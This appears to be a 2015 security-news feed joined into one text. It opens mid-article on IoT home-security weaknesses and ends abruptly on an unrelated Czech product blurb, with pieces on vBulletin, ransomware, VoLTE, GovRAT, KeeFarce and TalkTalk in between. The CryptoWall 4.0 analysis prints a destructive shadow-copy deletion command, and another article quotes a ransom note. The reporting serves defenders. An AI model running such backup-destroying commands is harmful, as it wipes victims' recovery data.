Motion sensor

Encouraged by an easy victory over contact sensors we moved on to the motion sensor and disassembled it to discover that it was a rather simple infrared sensor that detects the movement of a warm object. This means that if an object is not warm the sensor doesn’t care. As we discovered during our experiment, one would only need to put on a coat, glasses, a hat and/or a mask in order to become invisible to the sensor. Physics wins again!

Protection strategies

The bad news is that magnetic field sensor-based devices and low quality infrared motion sensors are used not only by the home security system we investigated. They’re pretty standard sensors which can be found in a number of other similar products. Just search the IoT e-shops and you’ll see for yourself. There is more bad news: it is impossible to fix the issue with a firmware update. The problem is in the technology itself.

The good news is that it is possible to protect yourself from the burglars who didn’t bunk off Physics in school. The basic rules here are as follows:

Do not rely only on contact sensors when protecting your home if you are using a system of the kind described above. Smart home security system vendors usually offer additional devices, like motion- and audio-sensing cameras, which are impossible to bypass with magnets. So it would be wise to supplement the contact sensors with some smart cameras even though it may cost more. Using contact sensors alone will turn your home security system into what is essentially a high-tech ‘toy’ security system.
If you’re using infrared motion sensors, try to put them in front of a radiator in rooms a burglar will have to walk through, should they make their way into your home. In this case the intruder, no matter what clothes they are wearing, will overshadow the radiator and the sensor will notice the change and report it to your smartphone.

Based on what we discovered during our brief experiment, vendors are doing their best not to forget about the cyber-security of the devices they’re producing, which is good. Nevertheless, any connected, app-controlled device that is usually called an IoT device is almost certain to have at least one security issue. However, the probability that they will be critical is not that high.

At the same time, the low severity of such security issues doesn’t guarantee that they won’t be used in an attack. At the beginning of this article we promised to describe how the safe and funny “rickrolling” vulnerability could be used in a dangerous attack. Here it is.

Just imagine that one day a TV with a Chromecast device connected to it, both belonging to an inexperienced user, starts showing error messages which report that, in order to fix this issue, the user has to reset their Wi-Fi router to factory settings. That means the user would have to reconnect all their devices, including their Wi-Fi-enabled coffee machine. The user resets the router and reconnects all the devices. After that the Chromecast works normally again as do all the other devices in the network. What the user doesn’t notice is that someone new has connected to the router, and then jumped to the baby monitor camera or other connected devices, ones that have no critical vulnerabilities but several non-critical ones.

Surviving in an IoT-enabled world

From an economic perspective it is still unclear why cybercriminals would attack connected home devices. But as the market of the Internet of Things takes off, and technologies are being popularized and standardized, it is only a matter of time before black hats find a way to monetize an IoT attack. Ransomware is obviously a possible way to go, but it’s certainly not the only one.

Besides that, cybercriminals are not the only ones who might become interested in IoT. For instance, this summer the Russian Ministry of Interior Affairs ordered (RU) to research possible ways of collecting forensic data from devices built with the use of smart technologies. And the Canadian military recently published a procurement request for a contractor that can “find vulnerabilities and security measures” for cars and will “develop and demonstrate exploits”.

This doesn’t mean that people should avoid using the IoT because of all the risks. The safe option is to choose wisely: consider what IoT device or system you want, what you plan to use it for and where.

Here is the list of suggestions from Kaspersky Lab:

Before buying an IoT device, search the Internet for news of any vulnerabilities. The Internet of Things is a very hot topic now, and a lot of researchers are doing a great job finding security issues in products of this kind: from baby monitors to app controlled rifles. It is likely that the device you are going to purchase has been already examined by security researchers and it is possible to find out whether the issues found in the device have been patched.
It is not always a great idea to buy the most recent products released on the market. Along with the standard bugs you get in new products, recently-launched devices might contain security issues that haven’t yet been discovered by security researchers. The best choice is to buy products that have already experienced several software updates.
When choosing what part of your life you’re going to make a little bit smarter, consider the security risks. If your home is the place where you store many items of material value, it would probably be a good idea to choose a professional alarm system that will replace or complement your existing app-controlled home alarm system; or set-up the existing system in such a way that any potential vulnerabilities would not affect its operation. Also, when choosing the device that will collect information about your personal life and the lives of your family, like a baby monitor, maybe it would be wise to choose the simplest RF-model, capable only of transmitting an audio signal, and without Internet connectivity. If that is not an option, than follow our first piece of advice – choose wisely!
As for the vendors of IoT-devices, we have only one, but important suggestion: to collaborate with the security community when creating new products and improving old ones. There are initiatives like Builditsecure.ly or OWASP Internet of Things project that could actually help to build an awesome connected device with no serious security issues. At Kaspersky Lab, we will also continue our research to get more information about connected devices and to find out how to protect people against the threats that such devices pose.

vBulletin security patches and zero-day exploit available online

Rumors on the Internet says that the hackers who breached vBulletin forum website exploited a zero-day flaw, the company issued emergency security patches.
On Sunday, the vBulletin official website has been hacked, according to DataBreaches.net, vBulletin, Foxit Software forums have been hacked by Coldzer0 that has stolen hundreds of thousands of users’ records.

The hacker published screenshots that show he managed to upload a shell to the vBulletin forum website and accessed user personal information, including user IDs, names, email addresses, security questions and answers, and password salts).

In response to the attack, VBulletin Solutions has reset the passwords for over 300,000 accounts on the official website, and The vBulletin technical support has released an emergency security patch release for versions 5.1.4 through 5.1.9 of the vBulletin Internet forum software.

“Very recently, our security team discovered a sophisticated attack on our network. Our investigation indicates that the attacker may have accessed customer IDs and encrypted passwords on our systems,” explained a vBulletin support manager.

It’s not clear if the patches were released because the attacker exploited a zero-day flaw in the platform, the hacker in fact claimed to have compromised the vBulletin.com database exploiting an unknown vulnerability. On Monday, the hacker using the online moniker “Coldzer0” started offering for sale a zero-day vBulletin exploit (“vBulletin 5.x.x Remote Code Execution 0day Exploit”) on a website that specializes in the exploit trading.

Tuesday, after vBulletin released the security patches, a the Twitter account @_cutz published the details of a remote code execution flaw in vBulletin. The experts speculate the existence of the flaw for the past three years.

vBulletin zero-day

The offer also includes a video POC of the vBulleting zero-day Exploit:

vBulletin is a very popular platform, it is used by more than 100,000 community websites, including some operated by Electronic Arts, Sony Pictures and Valve Corporation.

VBulletin is urging all users to update their installations as soon as possible.

Offline Ransomware is spreading among Russian users


Malware researchers at Check Point Technologies have discovered a new offline ransomware that is targeting mainly Russian users.
Malware researchers at Check Point Technologies have spotted a new “offline” ransomware that is targeting Russian users. The principal characteristic of this strain of malware is that it doesn’t need to communicate with a command and control (C&C) server in order to encrypt files.

This feature complicates the analysis of security firms because it is not possible to detect the communication with the control centers.

The offline ransomware has been around since at least June 2014, the experts highlighted that the threat actors behind the campaign have already released numerous variants of the malware.

offline ransomware 2

The last version of the offline ransomware (CL has been released in August 2015, the threat is well known to the principal security firms that detected it with various names (Ransomcrypt.U [Symantec], Win32.VBKryjetor.wfa [Kaspersky] and Troj/Ransom-AZT [Sophos].

Once the ransomware infects the victim’s PC, it encrypts his files and changes the desktop background displaying a message in the Russian language that includes the instructions to recover the files.

offline ransomware

“Your files are encrypted, if you wish to retrieve them, send 1 encrypted file to the following mail address: Seven_Legion2@aol.com
ATTENTION!!! You have 1 week to mail me, after which the decryption will become impossible!!!!”

All the files on the machine infected by the CL version, the one analyzed by the researchers at Check Point Technologies, were encrypted, and each one renamed to the following format:

email-[address to contact].ver-[Ransomware internal version].id-[Machine identifier]-[Date & Time][Random digits].randomname-[Random name given to the encrypted file].cbf


email-Seven_Legion2@aol.com.ver-CL 9@53@19 AM5109895.randomname-EFWMERGVKYNBPETHVKZNBQETHWKZNB.RGV.cbf

Victims are asked to pay a ransom between $300 and $380, depending on how fast they perform the payment, to receive a decryption tool and the key needed to recover their files.

The offline ransomware is written in Delphi and uses some Pascal modules, a choice not common for malware developers. The experts explained that the file-encrypting capabilities implemented by the offline ransomware are highly efficient, it is nearly impossible to recover the files once the threat has encrypted it.

Check Point has provided the following description of the file encryption process:

The beginning (first 30000 bytes) of each file is encrypted using two buffers of digits and letters that are randomly generated on the infected machine. The encryption process includes taking each original byte along with one byte from each of the randomly generated buffers and performing mathematical operations on them.
The remainder of each file (if it exists) is encrypted using an RSA public key (“local”) that is randomly generated on the infected machine, along with the matching local RSA private key required for decryption of the data.
The randomly generated buffers and the local RSA private key that are required for decryption are added as metadata to each encrypted file, and are then encrypted using three hardcoded RSA 768 public keys that the offender created in advance (“remote”). The matching remote RSA private keys required to unlock the metadata are located on the attacker’s side.
The threat actors used several email addresses in their campaign, most of them AOL and Gmail accounts. It is interesting to note that the unique account related to a Russian email provider, madeled@mail.ru, is also one of the emails associated with the original version of the offline ransomware. The address was no more used by crooks after the version

offline ransomware email

Ransomware are very profitable for cyber criminals, according to security researchers of the Cyber Threat Alliance which have conducted an investigation into the cybercriminal operations leveraging CryptoWall ransomware, criminals behind CryptoWall 3.0 Made $325 Million.

On a weekly basis, new malware appears in the wild, recently the fourth version of the popular Cryptowall was detected online and new ones are expected to come.

Trojanized adware: already infected more than 20,000 Android Apps

Researchers at Lookout firm have come across a new malicious adware family distributed via trojanized versions of popular Android applications.
Researchers at mobile security firm Lookout have come across a new malicious adware family distributed via trojanized versions of popular Android applications.

Security experts at Lookout have discovered a new strain of adware dubbed Shuanet, which is distributed via trojanized versions of popular Android apps, including the Okta’s two-factor authentication application, Candy Crush and Facebook.

Shuanet is able to gain root access to the infected device phone without the user’s knowledge, the threats install themselves as system applications and are very hard to remove from the devices.

The researchers at Lookout have discovered more than 20,000 popular Android applications that were trojanized with the adware Shuanet, Kemoge and Shuanet and distributed through third-party repositories. The trojanized versions of the mobile apps are fully functional, for this reason, they don’t raise suspicion. It is important to note that threat actors behind the campaign avoided compromising antivirus apps, a circumstance that suggests a high level of planning when creating these malware campaigns.

“Lookout has detected over 20,000 samples of this type of trojanized adware masquerading as legitimate top applications, including Candy Crush, Facebook, GoogleNow, NYTimes, Okta, Snapchat, Twitter, WhatsApp, and many others.” Lookout’s Michael Bentley wrote in a blog post. “Malicious actors behind these families repackage and inject malicious code into thousands of popular applications found in Google Play, and then later publish them to third-party app stores.”

The expert observed the majority of the Shuanet adware infections in the United States, Germany, Iran, Russia, India, Jamaica, Sudan, Brazil, Mexico, and Indonesia.

Lookout researchers believe that threat actors behind the adware campaigns Kemoge, Shedun and Shuanet are different groups, anyway the adware families appear to be linked. In some cases, the variants of malware analyzed share between 71 and 82 percent of their code, a circumstance that suggest the authors used the same pieces of code to build their versions of the auto-rooting adware.

Kemoge and Shuanet adware share at least three exploits to root devices.

adware android

“While historically adware hoped to convince the user to install new applications by showing banners and annoying pop ups, now it can install these third party apps without user consent. In this way it can heavily capitalize on the Cost Per Install paid out by web marketing companies,” Lookout’s Michael Bentley said in a blog post. “Unfortunately, should the revenue model change on clicks-per-install and ads, this may lead to malware authors using this privilege escalation for new monetization strategies.”

According to the experts, it is easy to predict that this type of trojanized adware will become even more sophisticated over the time.

“We expect this class of trojanized adware to continue gaining sophistication over time, leveraging its root privilege to further exploit user devices, allow additional malware to gain read or write privileges in the system directory, and better hide evidence of its presence and activities.”

Cracka hackers who doxed CIA Chief, not hit the FBI Deputy Director

Cracka, the crew of young hackers who doxed the CIA Director John Brennan now hit the FBI Deputy Director Mark Giuliano ’s wife by hacking her email account.
I always say, give a keyboard and internet connection to a kid and he would destroy your company. It is not a joke, the effort needed to launch a cyber attack is smaller than in the past, and the economy of an attack advantages striker, who faces a very low cost compared to defense and would cause devastating damage.

Recently, four teens were arrested in connection with the TalkTalk data breach, meanwhile a group of alleged teenagers has hacked the personal email account of the CIA Director John Brennan.

The group of young hackers calls themselves “Crackass” (Cracka) and now it seems they are targeting other US Government Officials, they are arrogant and heedless of the fact that the Feds are on their tracks.

“Now the hackers are back at it, despite the fact that the FBI is investigating them, and that some law enforcement officials anonymously said the government is going to “make an example” out of them.” explained Lorenzo Bicchierai on Motherboard.

One of members of the cyber gang “Cracka” told Motherboard that they have now hacked the email account belonging another illustrious US official, the FBI Deputy Director Mark Giuliano.

This time the hackers violated a Comcast email account belonging to the Giuliano’s wife, they also published online a series of screenshots to prove they were in the account. The attackers haven’t provided further information on the method they used to take over the email account.

An email account, event your wife’s email is rich of precious information like your contact list, but it could include more data such as information related your next trip or the results of a clinical examination to which you have subjected. In this case, the hackers have found Giuliano’s mobile phone in the email account’s contact lists and called him.

“I called it and asked for Mark and he’s like ‘I don’t know you but you better watch your back’ and then he hung up and I kept calling and he was getting mad then he didn’t pick up,” Cracka told Motherboard via online chat.

hacker CIA 3

The FBI still hasn’t commented the alleged hack of the Giuliano’s email.

The hacking crew targeted the FBI official because the Feds are investigating on them

Cracka said that they were not looking to get any information out of this hack, is an action conducted for revenge.

“We didn’t target him for anything interesting, we targeted him because FBI are [sic] investigating us,” he said.
Lorenzo Bicchierai who had the opportunity to view the screenshots shared by the Cracka confirmed that the account doesn’t appear to contain any sensitive information, except the contact list.

Anyway this contact list could be a good starting point for skilled hackers that could use is to target the family and friends of the couple in order to gather other information for a successive attack.

Stay tuned and thanks to Lorenzo Bicchierai for its excellent post.

CryptoWall 4.0 Released with a New Look and Several New Features

The fourth member of the CryptoWall family of ransomware, CryptoWall 4.0, has just been released, complete with new features and a brand new look.
We recently reported that CryptoWall 3.0 has allegedly caused over $325 million in annual damages. CryptoWall first emerged in April 2014. Its first major upgrade was dubbed CryptoWall 2.0, and first emerged in October 2014. CryptoWall 3.0 then emerged in January 2015 and terrorized organizations on a global scale. Now, in November 2015, CryptoWall 4.0 has emerged.

New Features

New features such as the encryption of the names and extensions of affected files have emerged with the 4th member of the CryptoWall family. Additionally, CryptoWall 4.0 has changed the name of its ransom notes to HELP_YOUR_FILES.TXTand HELP_YOUR_FILES.HTML.

The ransom note itself contains payment instructions and also mocks the infected user.

CryptoWall 4.0

Spread Method

The initially reported sample, provided by an infected user on the Bleeping Computer forums, was spread via e-mail through phishing e-mails with ZIP archive attachments claiming to be resumes. The file within the ZIP archive is a JavaScript file, that is obfuscated and beautified that downloads the CryptoWall 4.0 payload from a hard-coded URL.

CryptoWall 4.0 2

However, it’s likely that exploit kits will begin to deliver CW4 as a payload very soon, if they are not already (especially the Angler EK).

Technical Information

The C&C communication and behavioural activity of CryptoWall 4.0’s payload is quite similar to its earlier versions. The specific sample that I have analyzed performed the following actions, as can be evidenced by the below images.

Contacted Domains

CryptoWall 4.0 3

Added Files

CryptoWall 4.0 5

Deleted Files

CryptoWall 4.0 6

Modified Files

CryptoWall 4.0 7

Added Registry Keys

CryptoWall 4.0 8

Process Tree

exe -k netsvcs
EXE “C:UsersAdministratorDesktopHELP_YOUR_FILES.TXT”
exe “C:UsersAdministratorDesktopHELP_YOUR_FILES.HTML”
exe Delete Shadows /All /Quiet

Voice as a threat: VoLTE, a new tool to compromise mobile networks

While communication technology providers are seeking consensus over the future of 5G networks, carriers are wasting no time in rolling out new technologies available for the current 4G networks. Voice over LTE or simply VoLTE is one of these technologies. VoLTE allows transmitting voice calls over data layers.

Something's wrong with VoLTE

What exactly does that mean? Well, let us explain some technical details. Today’s cellular networks employ three ‘planes’: data, voice and control. We typically use the data plane for mobile Internet, and the voice plane for voice calls. The third plane, to put it simply, is used to manage everything what happens on the other two planes.

Traditional cellular networks handle voice calls through dedicated circuits. However, the 4G technology allows for the prioritization and transmission of voice traffic as packets with higher priority via the data plane. That is essentially VoLTE. The control plane packets have the highest priority. In essence, VoLTE is a sort of IP telephony (VoIP) adapted for use over cellular networks.

VoLTE brings a handful of benefits. First, ubiquitous VoLTE deployment will render existing 2G/3G infrastructures impractical and thus not necessary to support, since VoLTE won’t require a separate infrastructure to handle voice calls. Secondly, VoLTE offers higher bandwidth compared to 3G in boosting the voice quality.

The third benefit is that VoLTE can be used for video conferencing. Last but not least, mobile carriers claim VoLTE offers better call privacy and faster connection. All in all, it looks like VoLTE has a number of critical benefits with no particular drawbacks. At least upon first impression.

As it usually happens, every breakthrough technology has its growing pains. Researchers from the University of California, in joint effort with their colleagues of Shanghai Jiao Tong University and the Ohio State University, demonstrated practical attacks on VoLTE in two US Tier-1 carriers’ networks.

The researchers managed to demonstrate how a criminal can drop all of the victim’s calls, or to increase the amount of charges on the victim’s cellular bill, or vice versa to gain free mobile data access. The interesting thing is that criminals don’t need to hack networks to achieve their goals, or use expensive equipment to carry out the attacks. All they need is an unrooted or rooted smartphone.

The researchers’ key finding is that one can fool VoLTE and send ordinary data packets masqueraded as ‘the high priority’ signal or voice packets

This means that a potential attacker can have carte blanche. Signal packets are not charged for, so once you use this ‘wrapper’ for ordinary data packets, you can be freed from a responsibility of paying for your data plan. To offer a proof of concept, the researcher had a 10-minute Skype call and the carrier never registered their consumption of data traffic.

The signal (control) plane has the highest priority, which opens a pool of opportunities to culprits. If you jam up this layer with data packets masqueraded as signal packets, the signal packets won’t have enough bandwidth available. This method could be a means of cutting network access to someone or to launch a targeted attack and arrange network downtime by jamming it with faux signal packets.

Finally, attackers can use the same method to flood the victim with data packets which, provided the victim does not employ an unlimited data plan, might mean a lot of extra charges the target would need to pay to the carrier. Moreover, such attacks are not detected by firewalls, which are there to filter malicious traffic. In such an attack, a legitimate mobile traffic is used, which makes firewalls unable to detect an attack.

All of the above concerned the ability to transfer data packets via the signal (control) plane, but the same approach could work on the voice plane as well. For example, the researchers managed to subdue a voice call over VoLTE: a victim would accept the call but couldn’t hear anything, as voice packets were lost in the flood of faux signal packets.

The researchers offer a handful of solutions to at least partially solve the issues; both carriers whose networks were probed during the research have already deployed some of them.

How #hackers can exploit #VoLTE technology vulnerability to compromise #4G networks. #mobile #security
Countries like Germany or Russia have just started to roll out VoLTE services – so it may well be the case that all the carriers won’t be that fast patching the vulnerabilities.

Unfortunately, some of the vulnerabilities cannot be patched without making changes in VoLTE as a standard. Of course, carriers would be more vigilant of what happens in their networks and make sure to cut off the transmission of the signal traffic between any devices, except for legitimate connections between a phone and a signal server, but it is never enough.

To fix all VoLTE issues, there is a need for a joint effort of OEMs, chipset vendors, carriers and standardization bodies.

That’s the reason why the researchers try to widely publicize this problem: the more widely acknowledged the problem would become, the faster the solutions would be found.

Users, on their end, should treat their mobile security more seriously: in order to carry out the described attacks, adversaries would have to install a malicious app on smartphones. Such mobile malware is very likely to be detected by a good security software.

And, finally, the absolute majority of popular devices and 4G active networks don’t support VoLTE at all so far. Let us hope that, by the time VoLTE becomes a ubiquitous service, all security issues will be solved.

GovRAT, the malware-signing-as-a-service platform in the underground

Security Experts at InfoArmor discovered GovRAT, a malware-signing-as-a-service platform that is offered to APT groups in the underground.
In the past, I have explained why digital certificates are so attractive for crooks and intelligence agencies, one of the most interesting uses is the signature of malware code in order to fool antivirus. Naturally, digital certificates are becoming a precious commodity in the underground ecosystem, many operators in the black markets started this lucrative business.

A few weeks ago experts at IBM Security X-Force observed the offer of certificates in the Dark Web with a model of sale they called CaaS (Certificates as a service). Cybercriminals would use the Dark Web for selling high-grade code certificates -which they have obtained from trusted certificate authorities- to anyone that is interested in purchasing them.

The sale of code signing certificates has increased considerably over the past few months, a trend confirmed also by a recent research analysis conducted by the threat intelligence firm InfoArmor.

The research has given rise to a case in which a hacker tricked a legitimate certificate authority into issuing digital certificates for malware before offering a cyber-espionage tool called GovRAT.

GovRAT a hacking platform that allows the malware creation, it comes bundled with digital certificates for code signing. The same digital certificates were initially offered for sale on the black marketplace TheRealDeal Market hosted on the Tor network. GovRAT was offered for sale at 1.25 Bitcoin, but experts observed the creator is now selling it privately.

GovRAT Digital certificates

The GovRAT tool digitally signs malicious code with code-signing tools such as Microsoft SignTool, WinTrust, and Authenticode technology. The experts consider that final customer for GovRAT are APT groups targeting political, diplomatic and military employees of more than 15 governments worldwide.

The strains of malware analyzed by the researchers at InfoArmor were signed individually with different digital certificates.

InfoArmor reported also that seven banks, some in the US, and 30 defence contractors have also been targeted by the GovRAT. It has been estimated that more than 100 organizations have been hit by malware created by the GovRAT platform since early 2014.

Which is the price for code-signing digital certificates?

Experts at InfoArmor found the precious commodities on many underground black markets, they are offered for sale at a price between $600-$900 depending on the CA that issued them. It is quite easy to find code-signing digital certificates issued by Comodo, GoDaddy and Thawte. It is clear that digital certificates could be revoked by the CA, but as explained by numerous sellers the event is rare and often companies are very slow in invalidating them.

“[The buyers are] blackhats (mostly state-sponsored), malware developers,” Andrew Komarov, CIO at InfoArmor, told El Reg. “It is pretty professional audience, as typical script kiddies and cybercriminals don’t need such stuff. It is used in APTs, organised for targeted and stealth attacks. The appearance of such services on the blackmarket allow [hackers] to perform them much more easily, rather like Stuxnet.” “It is a pretty specific niche of modern underground market,” “It can’t be very big, as the number of certificates is pretty limited, and it is not easy to buy them, but according to our statistics, the number of such services is significantly growing.”

Stolen or fake certificates are a prerogative of state-sponsored attacks, they were used in numerous offensives including the Stuxnet and the Sony hack, the experts explained that cyber criminals are gaining digital certificates through resellers.

“Bad actors buy digital certificates through resellers, where the due diligence of customers is pretty poor,” Komarov explained. “They provide fake names, or fake information about the author and purpose on why they need this certificate, and receive it. After they have received such certificates, they trade it on the blackmarket for malware developers, allowing them to create signed malware for further APT in several minutes.”

InfoArmor reported the case of certs4you.org, a website offering malware-signing-as-a-service with prepared digital certificates. One such service ran from a website called certs4you.org before the domain was suspended.

Let me suggest reading the report on GovRAT published by InfoArmor.

Researcher releases Free Hacking Tool that Can Steal all Your Secrets from Password Manager

Unless we are a human supercomputer, remembering a different password for every different site is not an easy task.
But to solve this problem, there is a growing market of password managers and lockers, which remembers your password for every single account and simultaneously provides an extra layer of protection by keeping them strong and encrypted.
However, it seems to be true only until a hacker released a hacking tool that can silently decrypt and extract all usernames, passwords, as well as notes stored by the popular password manager KeePass.
Dubbed KeeFarce, the hacking tool is developed by Kiwi hacker Denis Andzakovic and is available on GitHub for free download.
Hackers can execute KeeFarce on a computer when a user has logged into their KeePass vault, which makes them capable of decrypting the entire password archive and then dumping it to a file that attackers can steal remotely.
How Does KeeFarce Work?
KeeFarce obtains passwords by leveraging a technique called DLL (Dynamic Link Library) injection, which allows third-party apps to tamper with the processes of another app by injecting an external DLL code.
The injected code then calls an existing KeePass export method to export the contents of a currently open database, including user names, passwords, notes, and URLs to a clear-text CSV file.
The key takeaway here is:
KeyFarce is just a password extraction tool that could work perfectly like a password Stealer for remote hacking when combined with a computer malware.
If that happens, it is game over as you'll have much bigger things to worry about since most of your data is generally logged in already.
While KeeFarce is specifically designed to target KeePass password manager, it is possible that developers can create a similar tool that takes advantage of a compromised machine to target virtually every other password manager available today.

Fourth, a 16-year-old Hacker, Arrested over TalkTalk Hack

Police have arrested a fourth person, a 16-year-old boy, from London in connection with the high-profile hack of British telecoms giant TalkTalk.
The investigating officers from the Metropolitan Police Cyber Crime Unit (MPCCU) arrested the teenager at his home in Norwich on suspicion of Computer Misuse Act offences.
TalkTalk was subjected to a 'significant and sustained' hacking attack on its official website two weeks back, which put the Bank Details and Personally Identifiable Information (PII) of its 4 Million customers at risk.
The telco confirmed last week that at most 1.2 Million names, email addresses and phone numbers and around 21,000 unique bank account numbers and sort codes were compromised in the attack.
However, TalkTalk said that the stolen credit card details were incomplete, so the payment cards could not be used for any false financial transactions. But, the company advised customers to remain vigilant against financial fraud.
Security experts believe that the recent hacking attack on TalkTalk may have taken place due to SQL injection (SQLi) attack, a method used to inject SQL commands to breach the database and get access to the users' personal data.
This is the fourth arrest since TalkTalk suffered a massive data breach and the 16-year-old boy remains in custody at a local police station.
The Police Service of Northern Ireland and MET detectives arrested a 20-year-old Staffordshire man on Sunday while 2 teenagers were also arrested in connection with the Data breach incident.
The first arrest came last week when police arrested and then bailed a 15-year-old boy from Northern Ireland while another 16-year-old boy from London was arrested and bailed on 30 October.
However, the connection between these four persons has not been known yet.

A Fourth Teenager was arrested over TalkTalk data breach

British police announced Tuesday they had arrested a fourth teenager in connection with a data breach suffered by the Internet Service Provider TalkTalk.
The investigation of the TalkTalk data breach is still going, in a few days other two suspects have been arrested by law enforcement under the country’s Computer Misuse Act. The company suffered other two cyber attacks in eight months that caused the theft of customers’ data. A few days ago a third man was arrested in connection with the TalkTalk hack, he is a 20-year-old man from Staffordshire and he has been released on bail until March after he was arrested by law enforcement under the country’s Computer Misuse Act.

Investigators believe that he is a member of the group that hacked the telco firm TalkTalk stealing 1.2 million customer details (email addresses, names, and phone numbers, dates of birth) along with nearly 28,0000 partial credit and debit cards.

talktalk HQ

According to a statement from the Metropolitan Police, a fourth hacker was arrested, another teen that is from Norwich.

The TalkTalk ISP admitted some data are that were stolen by hackers are not encrypted, they classified the attack as “significant and sustained” but downgraded the risk of possible financial theft resulting from the hack.

TalkTalk confirmed that it is supporting the investigation conducted by the National Crime Agency and law enforcement. There are many aspects still no clear in the incident, let me remind you that the company was hit by a DDoS attack before the data breach and that an alleged LulzSec member claimed responsibility for the it denying any involvement in the data breach.

Someone also sent a ransom demand to TalkTalk, but no news has been provided on its origin and authenticity.

Chimera, a new strain of ransomware in the wild

According to a German website, there is a new strain of ransomware dubbed Chimera that also threatens to publish personal data on the Internet.
A new strain of ransomware is targeting German companies, it is named Chimera and this time crooks don’t limit their extortion scheme to the file encrypting, they are also threatening victims to release sensitive data on the Internet.
The attack vector exploited by Chimera is the email, bogus emails are sent to the company employees to offer them a job or to apply for a job position. The malicious emails include a link to a Dropbox address, the messages try to trick employees into visiting the link claiming additional information.

When victims click on the link they download the Chimera ransomware that once installed encrypts user data present on the local system and on network connected drives. The ransomware displays victims the following message:

chimera ransomware

Victims need to pay 2.45 Bitcoin (around €630/$694) to decrypt the files. If the victims will not pay the ransom, the crooks will publish stolen data along with their name, on the Internet.

The researchers at Botfrei, who first spotted the malware, confirmed that here is no evidence that cyber criminals have leaked online the stolen data.

“There is so far no evidence or information whether the criminals have stolen from affected systems or are already published on the Internet personal information!” states a blog post published on Botfrei.
It is likely that the criminals have no ability to exfiltrate the encrypted data, that is expected to have a significant volume.

“Another problem with the edentulous threat posed by this ransomware is that the implication of a threatened personal information disclosure would assume that someone is combing through the files for that personal information,” explained the InfoSec analyst Bob Covello.

“This is a level of involvement that most ransomware criminals do not want to broach. Ransomware is designed for a quick payday for the criminals with little interaction with the victim.”

The primary defense against ransomware is to have the an updated backup of most important documents.

Project Zero Experts Found critical flaws in Samsung Galaxy S6 Edge

Experts at Google’s Project Zero have discovered a number of high severity flaws in the Android OS version running on Samsung Galaxy S6 Edge smartphones.
Experts at Google Project Zero are conducting an analysis of the Android operating system running on the Android OS installed by other manufacturers on their mobile devices.

The principal manufactures have been using the Android Open Source Project (AOSP) source code to customize the Google OS for their systems, and experts at Project Zero wanted to test them.

“The majority of Android devices are not made by Google, but by external companies known as Original Equipment Manufacturers or OEMs which use the Android Open-Source Project (AOSP) as the basis for mobile devices which they manufacture.”states the blog post published by the Project Zero team.

“OEMs are an important area for Android security research, as they introduce additional (and possibly vulnerable) code into Android devices at all privilege levels, and they decide the frequency of the security updates that they provide for their devices to carriers.”

Recently a team of ten researchers from the Project Zero team and other Google security teams analyzed Samsung Galaxy S6 Edge smartphone searching for vulnerabilities in OS running on it.

They focused their efforts in evaluating the possibility to escalate kernel privileges from both local and remote starting point.

The researchers tried to gain remote access to data managed by the Android device, including contacts, messages and photos obtaining persistence in the mobile phone.

Samsung Galaxy S6 Edge 2

After a week of intense tests on the Samsung Galaxy S6 Edge, the team has found eleven high severity issues, the most important is a path traversal vulnerability (CVE-2015-7888) affecting the Samsung WifiHs20UtilityService service that can be exploited by attackers to write arbitrary files on the device.

“There is a process running a system on the device that scans for a zip file in /sdcard/Download/cred.zip and unzips the file. Unfortunately, the API used to unzip the file does not verify the file path, so it can be written in unexpected locations.” states the post.

Another serious flaw (CVE-2015-7889) discovered by the team in the Samsung Galaxy S6 Edge is affecting the email client (CVE-2015-7889) installed on the device. The flaw could be triggered by attackers to forward user’s emails to a different account via a series of intents from an unprivileged application. The experts also found another vulnerability (CVE-2015-7893) in the email client can be exploited to execute arbitrary JavaScript code embedded in an email.

The experts explained that the device drivers and media processing were affected by several issues that they have quickly identified.

“We found issues very quickly in these areas through fuzzing and code review.” states the post.

The discovered issues are related to the image parsing (CVE-2015-7894, CVE-2015-7895, CVE-2015-7896, CVE-2015-7897, CVE-2015-7898) and the drivers (CVE-2015-7890, CVE-2015-7891, CVE-2015-7892).

The Project Zero team reported the security vulnerabilities to Samsung in July, the company has fixed eight flaws in October, the remaining ones will be fixed this month.

#opKKK Anonymous denied involvement in recent leak

#opKKK – The hacking collective Anonymous is denying involvement in the Monday leak of alleged Ku Klux Klan members that included several US senators.
A few days ago the popular Anonymous collective has posted a video message on YouTube and a message on Twitter to announce that it is holding a list of names of the Ku Klux Klan
The popular collective announced its initiative under the operation dubbed #OpKKK, the target in this phase of the operation started last year is the Ghoul Squad, a group that is considered an organization belonging to the KKK.
“We will release, to the global public, the identities of up to 1,000 Klan members, Ghoul Squad affiliates and other close associates of various factions of the Ku Klux Klan across the United States.”

Unfortunately, other groups or individuals within the collective are abusing the Anonymous brand to conduct their personal initiatives and gain notoriety. As reported by the Register the group Anonymous” (PUTNAIOOACA) posted on Pastebin a message threatening to out members of the Ku Klux Klan too.
“we will be revealing about 1000 of your klan member identities.” the Anonymous PUTNAIOOACA said. “We are not attacking you because of what you believe in as we fight for freedom of speech, We are attacking you because of what you do to our brothers and sisters.” “You messed with our family and now we will mess with yours.”
But PUTNAIOOACA collective seems to be interested in revealing the identities of the KKK members working in the institutions ( Law enforcement, politicians, and any public servant or government representative)

As promised, early this week someone disclosed online a list of alleged Ku Klux Klan members that included several US senators. The official account for the @Operation_KKK took the distance from the announcement and posted the following message.
The information disclosed by other groups alleged to belong to Anonymous, but not members of #OpKKK, Pastebin, includes total phone numbers and email addresses allegedly belonging to KKK members. The list contains the names of at least 4 U.S. Senators and 5 City Mayors.


Obviously something went wrong, experts speculate that a faction of the collective has moved independently and it wants to influence the @Operation_KKK’s effort. Other experts speculate that someone want to use the Anonymous Brand and the #opKKK to launch a smear campaign against prominent personalities.
At the time I was writing Anonymous is inviting all to join it today for an ALL DAY town hall conversation on race, racism, terror & free speech.( #OpKKK #HoodsOff)

For any information about #OpKKK Anonymous invited to refer to the official .@Operation_KKK twitter account

Hey guys, tomorrow November 5 is Guy Fawkes’ Day … what will happen?

Komplexní zabezpečení firemní sítě zajistí nové UTM od Keria


Komplexní zabezpečení firemní sítě zajistí nové UTM od Keria
Nové UTM zařízení Control Box NG100, které uvedlo na trh Kerio, je určené pro sítě menších firmem, ideálně prý do deseti uživatelů.

Jde o relativně drobné, nicméně plně vybavené řešení pro unifikované zabezpečení sítí. Jeho součástí je firewall a směrovač, detekce a prevence útoků (IPS), antivirová ochrana, VPN a filtrování obsahu.

